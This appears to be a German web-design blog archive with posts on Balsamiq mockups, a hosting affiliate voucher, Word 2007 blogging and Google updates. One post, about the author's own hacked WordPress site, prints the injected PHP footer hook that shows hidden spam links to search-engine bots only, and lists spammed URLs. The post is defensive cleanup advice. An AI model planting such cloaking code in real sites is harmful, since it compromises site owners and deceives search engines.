Balsamiq Mockups – Scribbles auf eine neue Ebene heben.

Logo On White in

Jeder kennt sie – Scribbles, praktisch und total hipp, um eine Idee kurz und knapp zu visualisieren. Was aber wenn seine unterirdischen zeichnerischen Fähigkeiten seine Scribbles wie eine Zeichnung aus dem Kindergarten aussehen lassen? Glück dem, der sich auf seinem eigenen Kunstwerk noch zurecht findet, aber dieses Stück „Kunst“ einem Kunden zu präsentieren – undenkbar.

Die Ausgangslage: Höchstmaß an Kreativität vorhanden. Scribbleskills = Zero! Manchmal ist aber auch schlichtweg kein Blattpapier vorhanden. Hier kommen Mockups ins Spiel. Meinen Kugelschreiber in allen Ehren, aber will ich nicht mehr drauf verzichten. Frei übersetzt heißt Mockup „Attrappe“ und impliziert bereits, dass es sich um etwas mehr als nur ein Scribble handelt.

Definition: Mockup (Wikipedia)

Der aus dem Englischen stammende Begriff Mock-up bezeichnet im Deutschen eine Attrappe. Er wird heute aber meist für ein maßstäblich gefertigtes Modell bzw. eine Nachbildung zu Präsentationzwecken benutzt.

Gerade wenn man Mockups zur Planung von Webseiten, Apps oder anderen Softwareprojekten verwendet spielen sie ihr ganzes Können aus.
Insbesondere wenn Ideen immer komplexer oder mehrere Abstimmungsprozesse durchläuft ist es wunderbar die Daten auf Basis von Vektoren einfach zu korrigieren.

Ich bin ein Fan von balsamiq

Um nicht einseitig eine Lobeshymne auf balsamiq zu singen gibt es hier ein ganz schönen Vergleich von fünf Mockup Tools auf t3n.

Balsamiq
Offizielle Website

Balsamiq Demo
Hier kann mann die Web-App testen, allerdings ist sie etwas beschränkt, man kan z.B. keine eigenen Bilder hochladen. Aber selbst der Export funktioniert, welcher im XML-Format per Copy & Paste exportierbar ist.
Web Demo testen

Fazit:
Digitiale Mockups sind nicht nur eine Arbeitserleichterung, sie helfen auch dem Kunden eine Idee besser zu verstehen. Es gibt verschiedene Tools, ich bin der Meinung, dass ein gutes Tool auch ein paar Eur kosten darf. Daher habe ich mich für Balsamiq entschieden.

 

Puristic Overload: Google testet Startseite ohne Buttons

Google testet derzeit die Startseite mit und ohne Suchbuttons.

Wie genau getestet wird ist unklar, jedenfalls steht fest, dass derzeit nur auf Google.com die Suche ohne Buttons getestet wird.
Ich bin der Meinung, die Buttons müssen bleiben. Viele Leute wissen nicht, dass man das Suchfeld auch mit Enter abschicken kann. Daher halte ich den Test für relativ sinnlos. Dennoch würde mich interessieren, wieviel Prozent der User damit zurecht kommen.

Schön, dass Google so puristisch ist, aber man kanns auch übertreiben. Ich denke nicht, dass das einen Mehrwert für die Nutzer bringt.

Screenshot: Google ohne Suchbuttons
Google-ohne-suchbutton in

Google ohne Buttons

 

Alfahosting Gutschein/Gutscheincode und Partnerprogramm

88x31 Alfa in

Wer derzeit nach günstigen Webspache mit PHP, MySQL inkl. Domain und mod_rewrite sucht, ist mit Alfahosting gut bedient.

Ich habe selbst ein Paket gebucht. Das Starterpaket ist nach meinen Recherchen das beste Angebot in diesem Segment auf dem Markt. Mir war sehr wichtig, dass auch mod_rewirte unterstützt wird.

Starterpaket:

300 MB Webspace
35.000 MB Traffic inkl.
50 E-Mail Postfächer
2 MySQL Datenbanken
1x Domain inkl.
PHP4+5, CGI, Ruby

Zudem bietet Alfahosting ein Partnerprogramm, mit dem man Kunden werben kann.

Manchmal kursieren auch Alfahosting Gutscheine im Web herum. Leider konnte ich bisher keinen funktionierenden Gutscheincode für Alfahosting finden.

Update: Habe heute einen Gutscheincode von Alfahosting exklusiv für diesen Blog zum Weitergeben bekommen.

Der Gutschein lautet:

HZOC-J3R3-CTNT-DTEH-SNER

Und kann hier eingelöst werden.

Der Gutscheincode ist gültig bis zum 30.06.2010.

Update (18. Mai 2010)
Ganz neu bietet Alfahosting jetzt auch einen SMS Gateway an:

Auf vielfachen Wunsch, bieten wir Ihnen ab sofort die Möglichkeit, Ihre SMS nicht nur aus dem Kundenbereich heraus, sondern auch von Ihrer eigenen Webseite zu versenden. Dabei können Sie auswählen, ob als Absender Ihr Name oder die Mobilfunknummer angezeigt wird. Die Text- und Hintergrundfarbe des Formulars kann von Ihnen dabei frei gewählt werden. So ist sichergestellt, dass sich das Formular optisch perfekt in Ihre Webseite integriert.

Worauf warten Sie noch? Bestellen Sie noch heute Ihr Guthaben für nur 0,12 Euro/SMS und los geht’s.

 

Mediengestalter Blog gehackt und keiner hats gemerkt (WordPress Exploit)

Google-search-results-cloaking-wordpress-exploit-300x87 in

Der Mediengestalter-Weblog wurde durch einen fiesen Exploit von WordPress gehackt. Die Sicherheitslücke wurde von mir geschlossen leider aber sind mir durch diesen Hack die Suchmaschinenpositionen abgeraucht. Es handelt sich um ein Spam-Hack, der mir in den Footer diverse unsichtbare Links einfügte. Das besonders hinterlistige war allerdings, dass die Links ausschließlich für den Googlebot sichtbar waren und somit kaum gefunden werden konnten. Zusätzlich wurde mit CSS der Content mit display:none ausgeblendet. Die einfachste Möglichkeit den Spam zu entdecken ist sich den Google-Cache in Text-Version anzuschauen.

site:www.mediengestalter-weblog.de

Cloaking-footer-text-300x73 in

Eine weitere Methode den Spam zu entdecken, ist sich bei den Google Webmaster Tools anzumelden.

Google Webmaster Tools

Stutzig wurde ich, als ich gesehen habe, dass sich mein Blog laut Google Webmaster-Tools hauptsächlich mit dem Thema Viagra, Herbal oder Generic befassen soll.

Google-webmaster-tools-content-exploit-300x185 in

Ich kann jedem nur raten seine WordPress Version immer auf dem aktuellsten Stand zu halten. Die Cracker werden immer einfallsreicher und hinterlistiger. Somit konnte ich leider auch nicht heraus finden wer hinter dieser Attacke stand.

Bewerbung um eine Reinclusion bei Google

Ich werde heute noch einen Reinclusion Request bei Google starten.

Hier der Link unter dem man einen Reinclusion Request starten kann.

Footer Spam HTML


<div id="_wp_footer">
...
Über 300 Spam Links
...
</div>

Verlinkt wurde z.B. auf

http://itp.nyu.edu/%7Eja771/emp/index.php?catid=3710
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=300
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=466

Anhang

Den Linux by Examples Blog hat es auch erwischt. Hier konnte bisher auch keiner herausfinden, wer hinter diesen Hack steht.

Who is behind this?
Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.

From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.

Tipp Google Bot Simulator:

Wer seine Seite nach unerwünschten Spam im Google-Index durchsuchen möchte, kann über den Google-Bot-Simulator seine Seite ansehen, wie sie der Googlebot sieht.

Wie wird man den Spam Hack wieder los?

Das ist leider nicht so einfach, da sich der Hack tief ins System frisst und nahezu überall seine Dateien hinterlegen kann. Daher empfehle ich eine komplett Neuinstallation von WordPress mit der aktuellsten Version. Dabei sollten alle bisher verwendeten Plugins gelöscht werden und neuinstalliert werden, da auch dort der Hack sein Unwesen getrieben haben kann.

Infizierte Orte können sein:

/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admin
/ etc...

Mit einigen Stunden Suche habe ich als einzigen Hinweis noch die Funktion „echo123“ entdeckt, welche über die WordPress-Funktion add_action() hinzugefügt wird.

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function
wpc7c16b8466d864eeefd20050625c7775() {
$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if(!(
$sebot==1 && sizeof($_COOKIE)==0)) return;
@include(
'./wp-includes/class-mail.php');
if(
sizeof($wparr)>0){
echo
"<div id=\"_wp_footer\">";
foreach(
$wparr as $k=>$v){
echo
"<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
if(
$i++==$inum) break;
}
echo
"</div>".$_footer;
}
}

Quellen und Tips zu diesem WordPress Link Spam Exploit:

http://www.village-idiot.org
http://technorati.com
http://googlewebmastercentral.blogspot.com
http://blogsecurity.net
http://playground.ebiene.de
http://www.teohuiming.name
http://www.prefblog.com

 

Sevenload arbeitet mit PHP, MySQL & Lighttpd (Lighty)

Sehr interessantes Interview vom Chefentwickler Thomas Bachem von Sevenload.de:

Am Montag traf ich Deutschlands wohl heißestes Web2.0 Startup im Bereich der Foto- und Video-Portale (entwickelt auf Basis von PHP und MySQL sowie lighttpd als Webserver) und schnappte mir Thomas Bachem, um ein wenig mehr über die Technik dahinter zu erfahren.

blog.thinkphp.de

Unser Chief Software Architect Thomas Bachem gab Rede und Antwort auf die Fragen in dem neuen Videointerview, welches auch als Start für kommende Interviewserien von Björn steht. Wir wünschen viel Erfolg für deine neue IT-Videoserie und bedanken uns herzlich dafür, dass wir die ersten in deiner Serie sein durften!

blog.sevenload.de

Björn Schotte ist einer der Geschäftsführer der Mayflower GmbH. Mayflower hilft uns die sevenload-Plattform schneller und besser zu machen und den stetig wachsenden technischen Anforderungen gerecht zu werden. Die jahrelange Erfahrung des Teams um Björn hilft uns, auch eine andere Perspektive auf unsere Plattform zu bekommen.

ibrahimevsan.de

Weitere Blogger-Stimmen zum Interview mit Tom unter:
sichelputzer.de
ralfeggert.de
basicthinking.de
dittes.info
blog.helmschrott.de

 

Word 2007 als Blog-Client (2. Teil)

Ich habe nun meinen ersten Blogbeitrag per Microsoft Office Word 2007 erstellt.

Bis auf ein paar kleine Kinderkrankheiten funktioniert das Bloggen über Word ganz Gut.

011907 0920 Word2007als1 in

Nach dem Klicken auf das „Veröffentlichen“-Symbol kam der Dialog „Blogdienstanbieter kontaktieren“. Leider blieb dieser auch, sodass ich irgendwann auf „Abbrechen“ klicken musste.

Danach kam die Mitteilung, dass der Blogbeitrag nicht veröffentlicht wurde. Was jedoch nicht korrekt war, denn der Blogbeitrag wurde in voller Pracht auf meinem Blog angezeigt.

Der Quelltext ist überraschend sauber und mit inline CSS und <p>-Elementen formatiert. Vom ersten Eindruck scheint Word konformes XHTML zu generieren.

011907 0920 Word2007als2 in

Möchte man einen bereits existierenden Blogbeitrag editieren, werden leider keine Bilder angezeigt. Das finde ich extrem nervig, da man damit nicht mehr den Gesamteindruck seines Beitrags erkennen kann.

011907 0920 Word2007als3 in

Und beim Editieren kam dann auch leider irgendwann dieser Fehler. Das Dokument konnte aber wiederhergestellt werden.

011907 0920 Word2007als4 in

Fazit:

Solide Funktionen aber leider noch nicht 100% ausgereift. Ich werde meinen Blog mal auf den neuesten Stand

Bringen und euch in einem dritten Teil ein Schluss-Fazit geben.

 

Bloggen über Microsoft Office Word 2007

Ich habe soeben mit etwas Erstaunen festgestellt, dass Word die Option „Neuer Blogbeitrag“ beim Erstellen eines neuen Dokuments besitzt.

Drum probiere ich es gleich mit diesem Beitrag aus.

Hier ist ein kleines Bild direkt eingefügt in Word. Mal sehen, ob es korrekt an den Server gesendet wird 😉 Ich bezweifele es ja irgendwie.

011907 0851 BloggenberM1 in

Während ich hier so schreibe, finde ich es eigentlich ganz angenehm. Zumindest ist es wesentlich besser als der WYSISYG-Editor von WordPress.

Das Einfügen von Kategorien ist auch sehr einfach über den Button „Kategorie einfügen“ realisiert.

011907 0851 BloggenberM2 in

Bis jetzt bin ich ganz angenehm überrascht. Es fragt sich nur, was Word für Quelltext generieren wird. Ich hoffe ich werde nicht an alte Frontpage-Quellcode-Zeiten erinnert.

Praktisch ist auch die Rechtschreibprüfung, was natürlich wesentlich zur Qualität der Blogbeiträge führt, da sich leicht ein kleiner Tippfehler einschleicht.

011907 0851 BloggenberM3 in

 

Jetzt werde ich mal ein paar Formatierungen testen:

Fett

Kursiv

Unterstrichen

Durchgestrichen

Rechtsbündig

Linksbündig

Mittig

Farbig

Hintergrundfarbe

20pt Schriftgröße

Courier Schriftart

 

Und jetzt der große Augenblick.. Ich werde auf „Veröffentlichen“ klicken.

011907 0851 BloggenberM4 in

 

 

UTF-8 ist nicht gleich utf-8 im Zend Studio

Wie ihr sicher alle wisst, ist für das richtige Arbeiten mit Kodierungen ganz wichtig, dass der Editor die Dateien
auch mit der richtigen Kodierung abspeichert.
Zend Studio hat die hilfreiche Funktion seine Kodierungen zu ändern, das habe ich auch gemacht in der Annahme,
alles richt gemacht zu haben. Habe ich UTF-8 ausgewählt. Aber Zend hat die Zeichen nicht wirklich als UTF-8 gespeichert.

 

Google’s Juni Update: Massive SERPS Verschiebungen – Eine Zusammenfassung

Gestern Nacht vom 27. Juni auf den 28. Juni 2006 hat Google weit reichende Änderungen in der Bewertung vieler Seiten live gestellt. Meine Seite ist leider auch (negativ) davon betroffen und so kam es, dass gestern nur noch ein Zehntel des sonstigen Suchmaschinen-Traffics bekommen habe.
Google Update – Abfall der Besucher ueber Suchmaschinen
Die Grafik zeigt den massiven Abfall der Besucher über Suchmaschinen seit gestern (28. Juni 2006) auf meinem Blog. ( 95% weniger Besucher über Google)
Das Thema wird bereits heiß diskutiert und einige wenige Leute haben bereits ihre persönlichen Erfahrungen zu diesem Juni Update gebloggt, das (zufällig?) genau in der WM-Fußballpause statt gefunden hat.
Auf meinem Blog sind die Änderungen auf allen Datencentern gleichermaßen aktiv geworden, daher kann ich die Theorie nicht bestätigen, dass nur auf einigen Datencentern ein neuer Algo getestet wird.
Das SEO-Radio meint, solch massive Verschiebungen hat es zuletzt beim Florida Update vor einigen Jahren gegeben.
Da meine Seite direkt von diesem Update betroffen ist, habe ich mich weit reichend informiert und die Wesentlichen Ausagen im Netz zum Google Update in Zitatform und Links zur Quelle zusammengestellt. Ich hoffe es hilft euch weiter, vielleicht habt ihr noch ein paar Ergänzungen und Erfahrungen, die ihr in den Kommentaren loswerden könnt.